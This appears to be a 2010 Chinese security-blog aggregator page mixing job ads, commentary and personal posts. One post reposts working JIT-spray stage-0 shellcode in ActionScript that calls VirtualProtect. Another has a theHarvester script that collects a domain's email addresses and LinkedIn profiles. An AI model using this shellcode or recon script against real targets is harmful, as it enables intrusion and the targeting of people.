perl /pentest/enumeration/google/theHarvester/theHarvester.py -d $1 -b google -l 500 >> $1_emails.txt
perl /pentest/enumeration/google/theHarvester/theHarvester.py -d $1 -b msn -l 500 >> $1_emails.txt
perl /pentest/enumeration/google/theHarvester/theHarvester.py -d $1 -b pgp >> $1_emails.txt
cat $1_emails.txt | grep @ |grep -v @edge-security.com |sort > $1_emails.txt
echo
echo "Searching for LinkedIN profiles with theHarverster..."
perl /pentest/enumeration/google/theHarvester/theHarvester.py -d $1 -b linkedin -l 40 >> $1_emails.txt
echo
echo "Finishing... E-mail Results:"
echo
cat $1_emails.txt

done =)

阅读全文
类别:安全检测 查看评论
Posted by hackloft at Wed, 10 Mar 2010 10:34:00 +0800
Posted by tombkeeper at Tue, 09 Mar 2010 14:49:00 +0800

一句话新闻: 某USB充电器软件监听TCP/7777端口, 远程匿名用户可以执行程序.

详情参考US-CERT文章: Energizer DUO USB battery charger software allows unauthorized remote system access


类别:Vulnerability 查看评论
Posted by sowhat at Tue, 09 Mar 2010 13:28:00 +0800
目前已经离职,休息中,期待下一站,下一份工作!
类别:默认分类 查看评论
Posted by met3or at Tue, 09 Mar 2010 11:25:00 +0800

今天在 Google Reader 上面一连看到好几个帖子说互联网和两会来着。一个帖子列出了《两会代表,谁为互联网说话》,原来仅仅陈天桥一人;另一个来自caoz 的和谐 blog 里面的帖子《悄悄的转载,呐喊的不要》。而李长官的说话是:网站整顿力度将加大 对个人站矫枉过正

而曹贼的转贴的李彦宏发的《互联网行业注定是弱势群体》感慨道:

今天看到一篇关于两会的博文,很有见地,转给大家看看:

在这样一个自扫门前雪的利益集团诉求横行的平台上,互联网行业注定是弱势群体。

此前国务院的三网融合意见中就对互联网产业未见任何鼓励和支持,而是让电信和广电融合对外挺进互联网地盘,所以,如果期待两会能给互联网以政策利好几乎不可能。

在很多已经年龄很大的委员代表的眼中,互联网几乎就是洪水猛兽,连提供给弱势群体的网吧都被视为眼中钉,更有对内容管制强化的大声呼吁。

在中国最高级别的决策会议上,却没有一个人愿意振臂高呼,或者哪怕是敢于提一两个句子来呐喊。

李彦宏的帖子里面顺带还转了个帖子《移动互联网:为何与两会热点咫尺天涯》。不知道 Robbin 是不是有点感慨自己光做商业没有影响政治啦?早在 2010 年 1 月 5 日,“整顿”之风刚刚刮起时我就在某个群里面跟人扯以下的观点:

sbilly(1xxxx) 17:12:24
互联网群体太缺乏行会了
sbilly(1xxxx) 17:12:39
这种对行业的打击,应该是大家一起来反抗的
sbilly(1xxxx) 17:13:14
呵呵 主要是大家一起来造势
sbilly(1xxxx) 17:13:19
大的形势是好的
sbilly(1xxxx) 17:13:23
blah blah
sbilly(1xxxx) 17:13:35
要不然一个点就被人无限放大,没得混了
sbilly(1xxxx) 17:15:00
新浪、网易、51 什么的都应该有自己喊话的渠道
sbilly(1xxxx) 17:16:13
整整在国内搞了十多年的一个行业,没有办法去影响决策层,甚至连行业协会都不动一下,这肯定是不正常的
sbilly(1xxxx) 17:20:24
呵呵
sbilly(1xxxx) 17:20:33
其实现在这个时间点蛮重要的
sbilly(1xxxx) 17:21:10
高层通过7.5之类的事件知道了互联网的威力,国内也有从严和从宽管理的声音(智囊团内部)
sbilly(1xxxx) 17:21:28
如果这个时间点,互联网行业没有什么象样的动作,
sbilly(1xxxx) 17:21:34
估计以后天平就不均衡了
sbilly(1xxxx) 17:21:46
哈哈,个人分析
sbilly(1xxxx) 17:23:56
控制是不能摆脱的
sbilly(1xxxx) 17:24:03
但是自己控制和别人控制能一样么?
sbilly(1xxxx) 17:25:14
现在互联网行业要做的是让政府相信行业内能处理好这个事情,也愿意配合政府来处理这个事情
sbilly(1xxxx) 17:25:24
而不是这样被单方向的说啥干啥
sbilly(1xxxx) 17:26:28
这个也是赌博
sbilly(1xxxx) 17:27:00
其实如何处理民企和国有企业关系,也是政府在摇摆的
sbilly(1xxxx) 17:27:16
他也希望找到一个好的方法,不简单粗暴的解决问题
sbilly(1xxxx) 17:27:27
但是如果他认为互联网不是一个好的试水环境
sbilly(1xxxx) 17:27:31
它就会简单粗暴
sbilly(1xxxx) 17:28:23
是啊,反而是互联网这样的行业容易试水
sbilly(1xxxx) 17:28:29
因为国家没有什么投入在里面
sbilly(1xxxx) 17:28:38
处理国企、民企关系更容易
sbilly(1xxxx) 17:28:52
中石油这种行业能一下让民企进去么?
sbilly(1xxxx) 17:29:13
说白了,互联网行业就是要争取当年深圳特区那样的特区待遇
sbilly(1xxxx) 17:30:50
一方面是经济特区,另一方面也是开启风气先河的特区

©2010 乌托邦. All Rights Reserved.

.
Posted by sbilly at Mon, 08 Mar 2010 23:25:50 +0800
http://t.sina.com.cn/icbm

大家关注一下我吧,我也会同时关注你的!:)
类别:创业感想 查看评论
Posted by icbm at Mon, 08 Mar 2010 21:30:00 +0800
如题
类别:默认分类 查看评论
Posted by mj0011 at Mon, 08 Mar 2010 19:48:00 +0800

工作地点在深圳,有意者把简历发送到mrhupo{AT}qq.com




A、应用安全工程师
工作地点:深圳
岗位职责:
1、能够针对公司业务和产品架构进行评估,给出合理的安全策略建议;
2、在出现各类安全事件时,提供紧急响应服务,帮助公司恢复系统及调查取证;
3、能够解决公司业务日常安全问题。
4、能够对安全系统数据进行简单的数据分析。
岗位要求:
1、计算机或相关专业本科以上学历(能力突出者学历和专业不限);
2、具备一年以上安全行业工作经验,或两年以上的系统集成、网络管理经验;(能力突出者不限)
3、有Unix、Windows系统知识经验,能熟练使用Unix、Windows系统平台下各种应用系统;
4、熟悉多种安全技术,掌握或熟悉各种攻击与防护技术;
5、能够独立完成各种系统(主机、网络,数据库等系统)的安全加固;
6、喜欢学习新知识、乐于接受新事物。
7、具有一定的编程、脚本能力者优先
8、有大型项目经验,或熟悉企业级网络系统维护经验者优先;
9、有安全、网络、系统,数据库国际认证证书者,如DBA、CCNP、CCIE、CISP、CISSP、SUN 等认证者优先考虑。


B、网络安全工程师
工作地点:深圳
岗位职责:
1、主要负责公司网络、IDC安全策略制定和安全事件应急响应。
岗位要求:
1、计算机或相关专业本科以上学历(能力突出者学历和专业不限);
2、具备一年以上安全行业工作经验,或两年以上的网络管理经验;(能力突出者不限)
3、熟悉各种路由交换技术,TCP/IP协议。
4、熟悉多种安全技术,掌握或熟悉各种攻击与防护技术,有网络攻击事件响应经验者优先。
5、喜欢学习新知识、乐于接受新事物。
6、有大型项目经验,或熟悉企业级网络系统维护经验者优先;
7、有CCNA、CCNP、CCIE等认证者优先考虑



C、后台开发工程师

工作职责:
负责开发监控和爬行类大规模后台server。 负责分布式/高并发计算平台的建设工作 负责安全平台的开发建设工作

招聘要求:
有Unix/Linux操作系统下的C/C++项目的2年以上开发经验; 熟练掌握shell编程,并熟悉mysql数据库操作; 熟悉面向对象的大型分布式系统设计与开发; 熟悉TCP/IP协议和Linux高性能服务器程序开发; 全面的软件知识结构(操作系统、软件工程、设计模式、数据结构、数据库系统、网络安全); 热爱创新,敢于面对挑战,热爱开发事业。 有从事网络安全相关经验者优先。

阅读全文
类别:默认分类 查看评论
Posted by coolc at Mon, 08 Mar 2010 17:50:00 +0800
# Title: JITed stage-0 shellcode
# Author: Alexey Sintsov
# Download N/A

// JIT_S0.AS
//
// VirtualProtect() stage-0 shellcode
//
// how to use stack
//
// 0000: 0x11111111 -- ret addr to JIT satge0 shellcode
// 0004: 0x60616f62 -- pointer on string atom (encoded high) if ret
// 0008: 0x60616f62 -- pointer on string atom (encoded high) if ret 4
// 000c: 0x60616f62 -- pointer on string atom (encoded high) if ret 8
// 0010: 0x6a616061 -- pointer on string atom (encoded low)
// 0014: 0x6a616061 -- pointer on string atom (encoded low)
// 0018: 0x6a616061 -- pointer on string atom (encoded low)
//
// This JIT shellcode find VirtualProtect, restore address of shellcode
// Make mem exec and jump to it.
//
//
// Restore function:
// ((high-0x60606060)<<4)+(low-0x60606060)
// So 0x0a11f021 - original address.
//
//
// By Alexey Sintsov
// dookie@inbox.ru
// a.sintsov@dsec.ru
//
// DSecRG - Digital Security Research Group [dsecrg.com]
//

package {
import flash.display.*
public class Loadzz2 extends MovieClip
{
function funcXOR1()
{
var jit=(0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c909090^0x3c44ec83^
0x3c90C033^
0x3c9030b0^
0x3c008b64^
0x3c0c408b^
0x3c1c408b^
0x3c08508b^
0x3c20788b^
0x3c90008b^
0x6a6b3f80^
0x3c90eA75^
0x3c904747^
0x6a653f80^
0x3c90ef75^
0x3c904747^
0x6a723f80^
0x3c90ef75^
0x3c904747^
0x6a6e3f80^
0x3c90ef75^
0x3c529090^
0x3c3cc283^
0x3c903a8b^
0x3c24148b^
0x3c90d703^
0x3c78c283^
0x3c903a8b^
0x3c24148b^
0x3c90d703^
0x3c18c283^
0x3c903a8b^
0x3c04c283^
0x3c901a8b^
0x3c241c03^
0x3c04c283^
0x3c90328b^
0x3c243403^
0x3c04c283^
0x3c900a8b^
0x3c240c03^
0x3cb89090^
0x3c900000^
0x3c9063b0^
0x3c5074b4^
0x3cb89090^
0x3c906574^
0x3c9072b0^
0x3c506fb4^
0x3cb89090^
0x3c90506c^
0x3c9075b0^
0x3c5061b4^
0x3cb89090^
0x3c907472^
0x3c9056b0^
0x3c5069b4^
0x3c90d78b^
0x3c90C033^
0x3c90ff33^
0x3c535156^
0x3c909090^
0x3c909090^
0x3c574790^
0x3c24048b^
0x3c02e0c1^
0x3c90f003^
0x3c90068b^
0x3c20c483^
0x3c240403^
0x3c20ec83^
0x3c90c933^
0x3c900eb1^
0x3c10c483^
0x3c90f48b^
0x3c90f88b^
0x3c18c483^
0x6a90a6f3^
0x14901474^
0x3c24ec83^
0x3c595b5f^
0x3c90905e^
0x3c9090eb^
0x3c24ec83^
0x3c595b5f^
0x3c90905e^
0x3c90e7d1^
0x3c90cf03^
0x3c90c033^
0x3c018b66^
0x3c02e0c1^
0x3c90c303^
0x3c90188b^
0x3c10c483^
0x3c241c03^
0x3c5cc483^
0x3c909058^
0x3c08c483^
0x3cb9905a^
0x3c906060^
0x3c9060b1^
0x3c9060b5^
0x3c90c12b^
0x3c90d12b^
0x3c04e0c1^
0x3c90c203^
0x3c90388b^
0x3c08c783^
0x3c406a54^
0x3c90016a^
0x3cd3ff57^
0x3c90e7ff^
0x3ccccccc);
return jit;
}

function Loadzz2()
{
var ret1=funcXOR1();
}
}
}

------------
记录备用。
阅读全文
类别:编程相关 查看评论
Posted by ShadowHider at Mon, 08 Mar 2010 16:20:00 +0800
不容易啊,感谢所有光顾以及留言的朋友们。近期觉得能在博客上写的东西越来越少了,要是不介意听我唠叨的话,可以加偶的twitter id: dm557。
类别:默认分类 查看评论
Posted by s4m at Mon, 08 Mar 2010 13:47:00 +0800

宋山木简介

  宋山木,山木培训创始人,山木教育集团总裁。

  1964 年宋山木出生于山东临邑。 1981 年考入山东聊城师范学院数学系本科。 1990 年华东师范大学计算机专业研究生毕业。从 1991 年 11 月份成立第一间 “ 山木培训 ” 至今,经他一手创办的培训学校,星星之火般在全国遍地开花,给人们创造了众多学习与就业的机会。同时山木终身教育集团也在英国、日本、美国、加拿大等国家设立分部。他自己也被誉为 “ 平民教育家 ” 、 “ 实业家 ” 。

成长:父亲的 “ 朴素成功学 ”

  宋山木自小就是个淘气大王,闯祸是他每天的必修课。上天赐给了他一位异常严厉的父亲,他稍有错处就棍捧相加。父亲吩咐他去做件事,不问过程只论结果,做不好便是一顿好打。许多年后,心有余悸的他会比同龄人有更多的细致与耐心,百分百投入地将事情做好,因为他从小就懂得:愉懒没有好果子吃。

  父亲有着自己的一套 “ 朴素成功学 ” 。父亲手把手教他学自行车,一边教,一边跟他闲聊:“孩子,自行车很好学,只要腰板挺直,盯住目标,脚下用力,记住这三点,就学会了。做人也是一样,成功就像骑自行车,你光盯着前方,方向有了,目标有了,但脚下不用力也是枉然。 ” 直至现在,宋山木还时时跟员工提起这三句话,他说: “ 无志者常立志,不付出行动不吃苦,再大的志向也是画饼!”

  1981 年,宋山木考入山东聊城师范学院数学系。大学期间他依然不爱学习。父亲花了两个月工资给他买了一台照相机,从此,他迷上了照相。课外活动的时候,他在图书馆前面摆摊,给同学们照相,并且自己成立了摄影协会。

  大二时,父亲写信要求他自立,他便又想出很多挣钱的点子,比如印一些书签 , 把照片弄成书签卖给别人,一毛钱一套 , 成本只有两分钱。这样,第一个月他就挣了 35 元,和父亲每月的工资差不多。临近毕业的时候,宋山木搞了一个个人摄影展,在学校非常有名,曾轰动一时。

  如今,宋山木终于领悟到父亲的苦心与执着。自己能有今天,父亲功不可没,可当他醒悟时,父亲已同他天人永隔。

机遇:落难时的一份菜单

  1991 年 8 月,宋山木来到深圳,他的动机很单纯 —— 买台便宜点的电脑。不料,刚下火车,钱包就被人偷走了。无奈之下,他只好露天睡在深圳书城对面的草坪上,也就是现在的地王大厦地皮。看着天上的月亮,生性坚强乐观的宋山木想:月亮、太阳总是毫不吝啬地将自己的光和热普照大地。如果有一天,我拥有自己的企业,名字就叫“ SUNMOON (日、月的英文)。”——这也就是山木培训名字的由来。

  第二天,宋山木来到一家小吃店用最后的几块钱吃早点。吃饭时,他无意中瞥见里屋有一台电脑,而店里的菜单却是手写的,字迹潦草歪歪扭扭。既然有电脑为什么不打印一份菜单,反而用手写呢?一问之下才知老板不会用!热心的宋山木立即帮老板打印了一份。通过这件事,他发现,虽然普通老百姓已经买得起电脑,可是大多却不会使用。这绝不是个别现象,而是普遍现象。

  后来他在一间电子厂找到一份电脑编程的工作,并碰上了为某家大型企业编制一套财务软件包的机会。经过一个月不眠不休的努力,宋山木提前保质保量地完成了任务,从而挖到了来深圳的第一桶金—— 4 万元。

创业:吃苦耐劳加眼光独到

  宋山木回到山东,毅然辞去了大学讲师的工作重返深圳。他想起那个餐馆老板不会用电脑的例子,在深圳这个城市,老百姓已经有了购买电脑的能力,但是却很少有人会使用,想要学习如何使用,却没有人教——这正好是一个市场的空白点,所谓“授人与鱼不如授人与渔”,人们的需求是亘古不变的成功点!为此,他萌生了“培养中国的电脑工程师”的念头。

  说干就干,绝不拖拉。1991年11月,宋山木租了一间教室,那天晚上他就把 A4 纸裁成近百张纸条,用圆珠笔写上“电脑培训,收费 80 元”,连夜塞进居民的邮箱和门缝。数天后,他迎来了自己的第一个学生。没有人手,他就一个人既上课又做宣传,接待报名,组装电脑,编订教案,印刷教材,忙起来饭都顾不上吃,创业时期的辛苦换来了学生的认可。

  为了扩大宣传,宋山木还想了一记妙招 —— 到电影院里打广告。有一段时间,在深圳最有名的电影院南国电影院,观众经常在影片播放过程中听到诸如“山木培训的 ** 老师,外面有人找!”之类的广播。如此一来,常来此看电影的人便很快都知道有个电脑学校叫山木培训。

  宋山木的很多主意至今也没扔,不论深圳、上海、北京、杭州、青岛,去这些城市,下了飞机,出了火车站,你准会看到一个人举着个大牌子,上面写着: “ 山木培训接 XXX” 。机场保安说你们怎么天天接人?那人就会反问: “ 不可以吗? ”

发展:独创企业管理方式

  经宋山木一手创办的连锁学校,星星之火般迅速在全球遍地开花 —— 香港、深圳、北京、上海、济南,远至英国、日本、加拿大、美国。在英国官方网站,山木终身教育集团与海尔、华为并列。宋山木头顶英国剑桥管理博士方帽子, “ 平民教育家 ” 、 “ 实业家 ” 两个耀眼光环。

  虽然如此,但他最看重的还是多年总结出的管理经验。宋山木有着经商天赋,有着良好的商业直觉。在管理上,他敢于排除众议,不唯书,不唯心,不唯利。知易行难,一些企业家在经营过程中,遇到问题就要查看春秋老庄、哈佛工商,而宋山木就敢于藐视这些干巴巴的印刷体,就敢于从理论回到常识,独辟蹊径,重新 “ 发明轮子 ” 。

  例如,山木培训采用“快餐店式”直营连锁办学模式,在服务上,山木培训推出“ 倒金字塔”式结构将学员置于服务的最顶层,推出“学员是上帝”的服务理念与山木礼仪为代表的服务举措。

  宋山木十分强调执行力,他独创了一套先进的管理模式,如“米”字型管理结构、“纳米管理法则”、“ 24 小时复命制”、稽核检查制、走动式管理,以及让任务描述量化、清晰化的“ HWWC ”“ QMW ”原理等,其中“纳米管理法则”曾得到中央党校的推广。

  不仅如此,山木培训在漫长的发展历程中逐步形成了自己深厚的企业文化,这成为山木人共同的价值标准与行为准则,渗透于每一个山木人的一举一动,一言一行中。山木员工自一入职,便被灌输“敬业、守信、创新、图强”的山木精神以及感恩思想,这些都成为了企业的价值观,产生了强大的凝聚力和向心力,使得山木培训各分校“形散而神不散”,构造成一个坚实的整体,同步向前。

  另外,广阔的个人发展平台培养了教职工的高度忠诚,“火炉原则”培养教职工的严谨自律,完善的培训体制塑造教职工的自我管理,高度统一的学校形象培养了教职工的荣誉感与归属感。

  宋山木的野心很大,他的近期目标是 “ 解放 ” 全中国,远期目标就是让有太阳和月亮的地方都有山木培训的存在,自己站在月球上看地球上到处飘扬着的山木培训蓝色旗帜。宋山木这个人们心目中的明星人物,以其独有的思想向世界证明着他的存在。

宋山木语录

○企业以人为本,没有了人,便停止不前,最终消亡。(“企” - “人” = “止”)

○团队是将有才能且服从意识强的人放在一起工作。

○“忙”就是“心死”,只要用心,你就可以找到让自己不忙的方法。

○没有处罚的规章制度等于废话。

○在一张旧地图上永远找不到新大陆。

○别人对待你的方式是你教给他的。

○我最大的财富是我的员工,你可以拿走一切,但请把我的员工留下。

○没有不行的员工,只有不行的领导。

○没有教不会的学生,只有不会教的老师。

○人才就是把合适的人放在合适的位置上。

○员工三境界:“人材”、“人才”、“人财”。

○不因为你的存在而给他人带来不悦,这是素质底线。

○高素质就是先人后己。

○一种行为重复三次便可以成为习惯。

○努力工作、为他人服务是人生存于世的基本职责。

○孝在前,成功在后,孝是人素质修养之根。

○水烧 99 度不叫开,事做 99 分不叫成。

○ 0.1>0 (不能为了追求完美而放弃行动)。

○有敌便进步,无敌便寂寞。

○对人要感恩、对己要克制、对事要尽力、对物要珍惜。

○做人的关键是心态,成功的关键是细节。

○失败不是成功之母,失败之后的总结才是成功之母。

○做事先做人。

阅读全文
类别:只言片语 查看评论
Posted by apple at Mon, 08 Mar 2010 13:33:00 +0800

4个月前在读效率方面的书,

2个月前在谈时间管理,计划了很多action。

1个月前,一切都发生了改变。所有的action都变的7零8落。

如今我不迷茫却很被动,三口之家的生活实在忙碌。

掌控时间也成了最重要的必备技能。


类别:默认分类 查看评论
Posted by cnqing at Mon, 08 Mar 2010 13:04:00 +0800
京华时报讯(记者周逸梅)针对3G手机对保密工作产生威胁的说法,昨天上午,国家保密局总工程师杜虹在列席政协联组会议时表示,普通人使用不会有影响。

  此前,有媒体报道,3G手机强大的视频传输功能,容易导致在使用过程中,将办公环境中的作战地图、文件或军事设施等涉密信息传输出去,相当于给对方来了个视频直播。3G手机具有照相、大容量存储功能,如果在工作场所拍照并流传出去,同样会在无意中造成泄密隐患。3G手机具有随时随地上网功能,也必将给安全保密和管理工作带来更大的难度。此外,3G手机还安装有操作系统、办公文字编辑等软件,不排除黑客使用木马程序控制手机视频、照相功能的可能性。

  国家保密局总工程师杜虹在会后表示,普通人使用3G手机无碍,但是核心的保密区域和保密人员不能使用3G手机。

阅读全文
类别:Cybersecurity 查看评论
Posted by sowhat at Mon, 08 Mar 2010 12:04:00 +0800
Neeao's Blog ( http://neeao.com/ ) :

职位 :网络安全工程师
部门:研发部
工作地点:北京
招聘人数:1
招聘类型:社会招聘
招聘时间:2010
联系邮箱:lifc@rising.com.cn
职位信息:
工作职责:
1、流行操作系统及应用平台的攻击及防御技术研究
2、跟踪国内外安全动态,对安全事件进行快速响应

任职资格:
1、具有网络安全攻防知识和经验,对各类操作系统、应用平台的弱点有较深入的理解
2、熟悉TCP/IP协议和逆向工程、C语言
3、良好的文字表达能力,较强的独立工作能力,面对压力较好解决问题的能力
4、计算机或相关专业本科以上学历(能力突出者学历和专业不限) ,1年以上相关工作经验。

有意应聘上述职位者,将简历发送到指定邮箱(邮件主题请标注应聘职位),请勿加附件。所有应聘资料存入公司人才档案库,恕不奉还。甄选应聘资料后,合则约见,未约勿访。

Posted by neeao at Mon, 08 Mar 2010 10:14:00 +0800

HR, Offer收到后,30天内可离职。

求职行业:
甲方:技术部、信息安全部、系统运维部门
乙方:技术服务部、售前部

期望工作地点:
广州

现工作行业:信息安全
2007年至今:北京天融信网络安全公司 (安全顾问)

有储备人才意向的猎头请MAIL ring04h@gmail.com 索取详细简历。


类别:默认分类 查看评论
Posted by ring04h at Mon, 08 Mar 2010 10:07:00 +0800

Log一下,每次用到的时候老是忘记...


类别:默认分类 查看评论
Posted by bugvuln at Mon, 08 Mar 2010 01:29:00 +0800

3月5日的晚上,加班在餐厅吃饭,收到一则短信“2010年3月5日 19点52分50秒QQ同时在线用户数突破100,000,000.在线精彩,腾讯精彩,有您更精彩。”

虽然前一天就看到9500W的在线数据,知道这个时刻即将来临,但是这个时候还是感到很兴奋和骄傲。

TST团队的很多成员,都以工作的形式,见证参与到这个时刻,能以用户和服务提供者的双重身份,出现在这一刻,真的很有意义。

挺感谢并珍惜业界朋友发给我们的每一份鼓励和批评,我们也深知,用户对我们的产品和服务还有更高的期许和要求,还需要不断努力。

在未来的日子里,我们一定把大家的期许和鼓励当作我们继续努力的动力。

因为有您,在线精彩,生活更精彩!

阅读全文
类别:腾讯安全团队(tst) 查看评论
Posted by coolc at Sun, 07 Mar 2010 20:56:00 +0800

简单介绍安全厂商与互联网业务,不当的地方还请补充和指正。

为什么安全公司要开拓互联网行业?

1、已有相当一部分客户来自互联网行业,需要有专门的行业团队跟踪,维护。

2、建立可以复制的商业模式。一旦有机会进入其它行业(如制造、酒店、地产、零售等),可以快速复制应用。

3、创造新的营收来源。

我们在2009年成立了互联网安全部门。包括一个互联网行业销售部门,一个SaaS产品部门。

互联网行业销售部门:面向互联网企业客户销售全线产品和服务

SaaS产品部门:针对互联网客户设计、开发互联网产品,制定解决方案

我们过去的产品和销售模式,已经证明是成功的,但在互联网行业,我们遇到了新的问题。互联网行业发展快速,但是做为一个企业,怎么对待安全投入,怎么实施安全建设,它还没有完全成型。把互联网客户对接到公司平台上去,我们的产品和销售模式,都给客户带来了门槛。

我们在实施的消除门槛的工作包括:

1、影响公司产品的走向,一款新产品上市,它应该是包含有互联网企业的功能需要的

2、对已有的产品,在参与的行业项目,启用定制开发策略

3、推进互联网产品成长,制定行业解决方案

4、在公司内,争取独立自主权,让行业团队能够完全的发挥,在行业内做决定

我们还在起步阶段,仍需多参与项目,在项目中学习。

阅读全文
类别:默认分类 查看评论
Posted by xuanliang at Sun, 07 Mar 2010 16:55:00 +0800
v1.2 beta 1